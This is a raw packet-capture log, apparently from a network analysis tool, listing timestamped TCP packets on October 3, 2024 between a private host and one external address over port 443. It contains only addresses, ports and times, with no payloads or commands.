                                                                                                                                                      Oct 3, 2024 09:16:18.595109940 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595165014 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595267057 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.595287085 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595304012 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.595335960 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596358061 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596419096 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596457958 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596472025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596489906 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596538067 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604568958 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604626894 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604707956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604763031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604782104 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604815960 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.628890038 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.628911972 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.629024982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.629077911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.629134893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.631355047 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631371021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631437063 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.631445885 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631489038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.651921034 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.651937962 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.652062893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.652077913 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.652120113 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.660984039 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661020041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661155939 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.661170959 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661353111 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.678049088 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678080082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678253889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.678281069 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678335905 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.683801889 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.683856964 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.683907986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.683917999 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684087038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684087038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684650898 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684693098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684729099 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684742928 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684773922 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684796095 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.691338062 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691356897 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691560984 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.691574097 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691617966 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.715926886 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.715945005 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.716042995 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.716054916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.716099024 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.718575001 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718590021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718650103 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.718657970 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718705893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.742258072 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742271900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742391109 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.742403984 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742448092 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.748042107 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748058081 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748136044 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.748146057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748189926 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.765016079 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765037060 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765250921 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.765275955 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765325069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.770672083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770685911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770752907 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.770761967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770798922 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.771683931 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771697998 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771756887 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.771764040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771802902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.778345108 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778359890 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778423071 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.778429985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778470993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.802403927 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802427053 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802522898 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.802535057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802577972 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.805310965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.805325985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.805397987 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.607501030 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.607534885 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.607613087 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.607636929 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.607652903 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.607676029 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.674391985 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.674412966 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.674565077 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.674588919 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.674638987 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.703331947 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.703357935 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.703517914 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.703552008 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.703596115 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.738337994 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.738363981 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.738532066 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.738558054 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.738703012 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.769115925 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.769135952 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.769304037 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.769329071 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.769377947 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.790036917 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.790055990 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.790313005 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.790335894 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.790385962 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.807749987 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.807768106 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.807897091 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.807921886 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.807966948 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.825136900 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.825160980 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.825277090 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.825299978 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.825345993 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.839360952 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.839379072 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.839499950 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.839528084 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.839570999 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.855720997 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.855743885 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.855849981 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.855890036 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.855940104 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.869023085 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.869055986 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.869144917 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.869184017 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.869240999 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.883853912 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.883882046 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.884013891 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.884087086 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.884152889 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.896028042 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.896055937 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.896178961 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.896197081 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.896256924 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.905097008 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.905127048 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.905203104 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.905227900 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.905282021 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.914952993 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.914973974 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.915057898 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.915074110 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.915113926 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.923393965 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.923424959 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.923500061 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.923527956 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.923573017 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.930429935 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.930464983 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.930546045 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.930572033 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.930610895 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.939917088 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.939946890 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.940040112 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.940069914 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.940109968 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.950532913 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.950577974 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.950767994 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.950800896 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.950855970 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.963632107 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.963654995 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.963774920 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.963805914 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.963852882 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.977559090 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.977588892 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.977685928 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.977718115 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.977760077 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.988424063 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.988452911 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.988535881 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.988560915 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.988601923 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.996615887 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.996640921 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.996722937 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.996743917 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.996803999 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:24.006419897 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.006444931 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.006532907 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:24.006547928 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.006589890 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:24.013362885 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.013387918 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.013457060 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:24.013467073 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.013504982 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:24.021783113 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.021807909 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:24.021934986 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.642967939 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.643066883 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.643078089 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.643121958 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.651812077 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.651827097 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.651895046 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.651905060 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.651946068 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.658884048 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.658900976 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.658993959 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.659002066 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.659040928 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.668176889 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.668191910 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.668253899 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.668262959 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.668298960 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.679446936 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.679466009 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.679532051 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.679542065 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.679598093 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.692791939 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.692807913 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.692940950 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.692950964 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.693058014 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.706619024 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.706636906 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.706727028 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.706736088 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.706777096 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.717024088 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.717058897 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.717088938 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.717096090 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.717122078 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.717144012 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.725732088 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.725756884 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.725884914 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.725898027 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.725948095 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.734889984 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.734911919 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.735027075 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.735050917 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.735097885 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.742419958 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.742480993 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.742580891 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.742602110 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.742616892 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.742646933 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:25.750737906 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.750770092 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:25.750870943 CEST49732443192.168.2.649.12.197.9
